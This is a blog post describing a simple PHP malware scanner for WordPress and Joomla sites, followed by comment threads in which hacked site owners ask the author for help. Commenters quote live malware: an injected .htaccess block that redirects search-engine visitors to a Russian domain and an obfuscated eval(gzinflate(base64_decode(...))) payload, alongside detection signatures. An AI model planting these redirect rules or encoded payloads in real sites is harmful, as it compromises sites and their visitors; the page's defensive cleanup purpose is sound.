This Malware Scanner script scans files and detects for a possible malware codes. This script will return a list of possible infected files. Each file will be labelled with (eval, c99madshell, & long_text) and a portion of the matched codes. The script will match a word “eval(…), <?php $md5=”…”; $wp_salt=”…”; … (also know as ‘c99madshell’), and a long_text such as “FEKS2121asFklMn83kUgdlf/sDkn12L+…”, because I believe these are potential malware code.
When you’re done running the malware scanner script, double check the result. Do not delete or clean them immediately. The script matches also clean files as long as it has the 3 potential hacker codes. So, please be careful.
Below are the sample results:
1. ./website.com/wp-includes/js/tw-sack.dev.js – eval – eval(this.response
- File - ./website.com/wp-includes/js/tw-sack.dev.js
- Label – eval
- Small portion of Matched Code –
eval(this.response - Not a hacker code
2. ./website2.com/system/libs/65d1.php – long_text – UeZTUf77n6yg8roYttj54AztjS3gfP7FhotwRGOTO9CKDOJeAr
- File -
./website2.com/system/libs/65d1.php - Label –
long_text - Small portion of Matched Code – UeZTUf77n6yg8roYttj54AztjS3gfP7FhotwRGOTO9CKDOJeAr
- I checked the file and confirmed it was a hacker’s code.
Download Malware Scanner
To use the script you can run it on your favorite browser or using a command line (recommended):
$ time php scanner_2.6.php 2>&1 >> scanner_log | tail -f scanner_log
This command will run the scanner_2.6.php and log the output on scanner_log file.
- Title : scanner_2.6
Caption :
File name : scanner_2.6.zip
Size : 3 kB
Malware Cleaner
Hi Paolo
First up, thanks for your great work with this script.
When I run it via command line or browser, I get this:
../infected/################################################################################
Found Files
Summary. You can take a better look on files that matches a potential hack script.
Then in my error log I see:
[28-Feb-2012 20:41:34] PHP Warning: opendir(../infected/) [function.opendir]: failed to open dir: No such file or directory in /*****/*****/public_html/barcodeinfo/scanner_2.3.php on line 83[28-Feb-2012 20:41:35] PHP Warning: Invalid argument supplied for foreach() in /***/*****/public_html/barcodeinfo/scanner_2.3.php on line 57
Any ideas?
thanks
Anthony
Oh! Sorry about that Anthony, I have fixed it, I changed now the
$root="./";on line 25.Let me know your thoughts about the scanner. Thanks for using.
Regards,
Paolo
Paolo
I have some malware issues going on but I’m not sure how to fix. I run the cleaner and it works but the malware returns again so I don’t think that I’m getting to the root of the issue. I ran the scanner but am not sure what I’m looking for. Can you please help or point me in the right direction?
These are always the infected files found by the cleaner
./index.php
./wp-admin/index.php
./wp-content/index.php
http://ericpostonline.com/scanner_2.3.php
Hi Brian,
We need to find the script that creates the malware code.
The scan result can help me find it.
I’ll run the scanner on your site and check the result.
Let you know.
Paolo
Great work Paolo….This is really useful plugin
The best one indeed.
Thank you
but this isn’t a plugin. It’s just a simple script 
Have a great day!
The scanner code is not working for me, it says that the server is busy after it stays there for a while like it is doing something but is says server busy after a while.
Total newb here, pls be patient
And thank you very much for this!
Hello Rulex,
Thanks for using my code. Can you check if there’s scanner_log on your directory where the scanner_2.4.php is located.
Actually, the scanner should output directories or files as it scans your server.
If it doesn’t show try this command :
Also, when it’s done can you send the scanner_log to info@php-beginners.com because as of now I am the only who can
understand the scanner_log but am still working on upgrading it.
Let me know. Thanks.
Paolo
Hi Paolo,
I ran the script on my site and is having the same issue as the guy above. I don’t know what I am looking for and not sure if the malware is cleaned because the malware is still on the site. Here is the site
http://thelauryndoll.com/scanner_2.4.php. I will email you as well. Thanks.
Hello Teresa,
Thanks for using malware scanner. I’ll run it now and see what I found.
Thanks. Keep you posted.
Regards,
Paolo
Hi Teresa,
I just finished running the scanner, I found these suspicious 12 files:
2. ./wp-signup.php
-eval – eval(base64_decode(“ZXZhbChiYXNlNjRfZGVjb2RlKCJaWF
76. ./wp-content/themes/headway/library/api/api-child-theme.php
-eval – eval(base64_decode(“ZXZhbChiYXNlNjRfZGVjb2RlKCJaWF
108. ./wp-content/themes/DailyNotes/page-gallery.php
-timthumb vulnerability – timthumb
109. ./wp-content/themes/DailyNotes/changelog.txt
-timthumb vulnerability – timthumb
-timthumb vulnerability – Timthumb
110. ./wp-content/themes/DailyNotes/page-template-portfolio.php
-timthumb vulnerability – timthumb
111. ./wp-content/themes/DailyNotes/single.php
-timthumb vulnerability – timthumb
112. ./wp-content/themes/DailyNotes/page-blog.php
-timthumb vulnerability – timthumb
115. ./wp-content/themes/DailyNotes/epanel/custom_functions.php
-timthumb vulnerability – timthumb
120. ./wp-content/themes/DailyNotes/includes/entry.php
-timthumb vulnerability – timthumb
121. ./wp-content/themes/DailyNotes/includes/entry2.php
-timthumb vulnerability – timthumb
122. ./wp-content/themes/DailyNotes/includes/functions/troubleshooting.php
-timthumb vulnerability – timthumb
-timthumb vulnerability – Timthumb
123. ./wp-content/themes/DailyNotes/includes/functions/installation.php
-timthumb vulnerability – TimThumb
I really got the feeling that the main malware script is in ./wp-signup.php
Please send the files to me at info@php-beginners.com
Let me know. Thanks.
Paolo
Hi Paolo, can I use the script to scan an Joomla website?
Thank you.
Cesar
Yes Cesar, you can use it on Joomla, just send me the scan result if you don’t know how to read it.
Thanks for using it.
Paolo
I don’t know anything about php and would like to use this scanner. I know basic WP installs but that is it. My sites have been hit with a JS Redirect trojan. My host company found malware on a few sites and cleaned those. I’m blocked by my antivirus from visiting a couple other sites still. Do you have steps for a complete newb on how to use your scanner?
Thanks,
Wayne
Hi Wayne,
I’ll create one for you Wayne don’t worry.
What hosting are you using? What’s your website URL?
Can you access your server using “Shell Access” if
don’t have any please ask your hosting support about
“Shell Access”.
Keepy you posted.
Thanks.
Paolo
Pingback: WordPress Hack : Malware Scanner | Komputer, Internet, Software Tips
Thanks for the script but I get timeouts
I am on Dreamhost.com but live in Germany…
http://www.nowayland.com/cleaner28.php
http://www.nowayland.com/scanner26.php
I have 5 WordPress sites on there and one directs ONLY in Safari oddly… Can you help? I have reinstalled wordpress but not removed old themes or old plugins but updated most…
Hello,
Did you try to run the scanner to run on CLI?
Paolo
Hi Paolo, thanks for the great work.
, I’m been infected by and old installation of Joomla (almost sure) that I’m not using anymore. But, they infected all my server drupal installations changing the .htaccess files with the code on the end of my message.
It’s possible to run the script in a drupal installation?
Let me explain my scenario
I ran your cleaner but about 30 min after the .htaccess it has been modified again.
Any ideas??? I’m run of it.
Any help It will be appreciated.
p.d. Sorry for my english.
Best regards!!
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|
altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|
metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|
aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|
metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|
webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|
lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|
brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|
cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|
sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://colcevoce.ru/infinity?8 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|
arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|
telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|
klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|
click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|
kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|
friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|
express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|
startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|
allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|
westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://colcevoce.ru/infinity?8 [R=301,L]
Hello Enric,
You need to find the file that is responsible on writing again
the malware script on your server.
You can do it by running a malware scanner, you can download it here:
http://www.php-beginners.com/wordpress-hack-malware-scanner.html#id-download
and send the scan result to me @ info@php-beginners.com.
Paolo
Ok, thanks Paolo,
. There’s a lot of drupal installation, but fortunately the problem it’s the same.
I’ll leave running the script all night.
I had tried to search manually the f… file, but with no results
Thanks in adavance!!
Enric
I had a blog where the hackers injetced black hat links in my content. The liks could only be seen in the code and not on the visual part of the blog. I found out it was hacked when I looked up the most used keywords in Google webmaster tools. I knew I never used keywords like viagra and other pharmacy products, still it was according got GWT the most used keywords onm my site. I did not use the timthumb.php. Script, and I am not quite sure where the hackers got in. It my be the files on the server had write access and the server was shared. Bjorn recently posted..
Hi Paolo!!,
the script still working. A lot of directories
Tomorrow I’ll send to you.
Thanks
Hi, Paolo,
Thanks for the scripts. My site have been struggling by the hackers for months, and i have no idea how to solve it instead of keep asking the host Q&A to restore…I guess ur work can help me to get rid of it completely…but the problem is the scanning is running very slow on my computer that no result showed. Also, i believe even the result can show, i cant able to read it. Sincerely ask you to help me~~Thank you…
Hello Angela,
Don’t worry just send the result to me @ info@php-beginners.com
I’ll read it for you. Just let me know. Thanks.
Paolo
I think my sites (22 joomla installations on one server). I have run your cleaner and scanner. But I have problem finding the source of my problem.
Hello Kenneth,
Just send the scan logs to me. Maybe that way we can find the mail malware script.
Let me know
Paolo,
I sent you an email at info@php-beginners.com.
I’m unable to run the scanner_2.6.php script from any browser. The email contains info that may help.
I hope this was ok…. just desperate to fix this problem!
Regards,
Pinky
Hi Paolo, I’ve sent you an email with a scanner log. If you could help Id really appreciate as this has been driving me mad for weeks.
Best,
John
Thank you Paolo!
I have replaced all garbage code from your help and changed FTP details.
After 3-4 days again this code came back, What should i do?
Hi Vibha,
Can you please try to scan your site. Download my malware scanner here:
http://www.php-beginners.com/wordpress-hack-malware-scanner.html#id-download
Run and send the scan result to me at info@php-beginners.com
Let me know. Paolo
Thanks for reply.
I found these code in all index files.
* ./wp-content/themes/twentyeleven/index.php
-eval – eval(base64_decode(‘JGlwPSRfU0VSVkVSWyJSRU1PVEVfQU
* ./index.php
-eval – eval(base64_decode(‘JGlwPSRfU0VSVkVSWyJSRU1PVEVfQU
And found one cgi_bin folder under root which have yhqti.php file with garbage coding.
There is also one log file generated on root because of virus, which have all visited user’s ip addresses.
ah! I see. just continue the scan and send the result to me.
We need to find the file that is responding of rewriting the malware codes again.
Hello Paolo my site appear to have in the main header the eval64 codes and i deleted all the codes and it appeared again! I have sent the results to your email please review the codes..
Hello Viptor,
I just replied to your email. Please check it out. Thanks.
Hey,
tbaks for the scanner, but can’t you explain how to use your scanner for people who don’t know about command lines and shell whatever? Is that so difficult? What do i have to do? Upload the file and start it somehow?! How? Thank you.
Hello Tofe,
Actually, you can run it on your favorite browser.
example:
http://www.yourwebsite.com/scanner_X.X.php
Hello Paolo, thanks for your program. I am having the malware problem in my wp header.php file. i cleaned it 100 times but it keeps coming back. I made a scan with your code but the result is too long and complicated. and it says 140 possible malware codes found. is there any way that you can help me?
Thanks
Hello Abrek,
Thanks for using my script. Just send the scan result to me at info@php-beginners.com
I’ll analyze the result for you
Let me know.
I sent the mail just now. Thank you very much!
I am now stumped I had 3 sites hacked. I think I have 2 fixed but one the code in the header.php keeps coming back. I an not that good with code. the code that keeps coming back is
#c3284d#
echo(gzinflate(base64_decode(“JY5NDsIgEIX3Jr0DmU11U6ILFwp4CS9AKcIohYYOVm8vtbuXL+9PzCbjRIy+k5VA9kP8qd96o6Ca3ZBMGW2kbslIdt8KfGQ9WjZnI8ETTRfO+6DNC8vY5cIxdsbh7XgGFqtPwn1BIpuB1c4UAkYnQRdKwP5FfcqDzRJiBTqgixJMnVsD3qLzJOEEbMGB/KqU4NsB1R6uzU7w7an6AQ==”)));
#/c3284d#
I have all three programs on the site
http://www.tenofthebest.net/scanner_2.6.php
http://www.tenofthebest.net/cleaner-cli_2.10.php
http://www.tenofthebest.net/cleaner_2.10.php
the cleaner says no infected but that line keeps coming back. I also have tried the scanner but not sure what I am looking for. Everything I look at seems to belong but I am not a coder.
I really would appreciate if you could give me a tip on how to find the problem with the scanner because I am sure it will happen again and I will need to try and figure out how to fix on another site.
Thanks,
Jeff
hopefully I got it.
Hello Jeff,
There are certain malware signature that cleaner cannot recognize, maybe it’s a new malware signature. We need to run malware scanner it’s in:
http://www.tenofthebest.net/scanner_2.6.php
and send the scan log to me at info@php-beginners.com
I’ll let you know.
Paolo
Hello Paolo,
i have uploaded ur malware scanning script on my server, my site works fine on direct access but if i access it through search engine it redirects to a iframed page, although i had my hosting company scan it but they failed to fix it and messed up my website’s layout
this is the site: http://reviewjuicers.com/scanner_2.6.php where i have added the script
Hello Taimoor,
Oh I see, let’s fix your site. Please run the scanner and send the result to me at info@php-beginners.com
Let me know.
Hello Paolo,
First of all, thank you for helping out so many people. I hesitate to ask for your assistance when I see how much you have already done. I’ve read through the posts above and I have a question about whether I’ve used your scripts correctly.
My site is causing malware warnings for some of its users. I am concerned that if I don’t fix it soon that Google will blacklist it. We are a community-based photography festival in Chicago and have just launched our yearly program this week. I’m in trouble!
I ran the scanner at http://www.filterfestival.com/scanner_2.6.php and it reported 189 suspect files. I then ran the cleaner at http://www.filterfestival.com/cleaner_2.10.php and it reported 0 infected files.
Does this mean that your script was successful?
Thank you again for your help.
Jeff
Hi Paolo,
First off, thanks for creating this. I have uploaded scanner_2.6.php to the root folder of my website and I get the following error when trying to run it:
Error 355 (net::ERR_INCOMPLETE_CHUNKED_ENCODING): The server unexpectedly closed the connection.
Can you run the scan for me or give me some pointers? Thanks in advance!
http://www.texaselectricbroker.com/scanner_2.6.php
Best regards,
Chris
Hello Paolo, great work with the script! I sent you an email with the log file I got from the scan… let me know if you’re available to help!
Thanks
Fernando
Hi Paolo
I have request few and need your help?
Cosy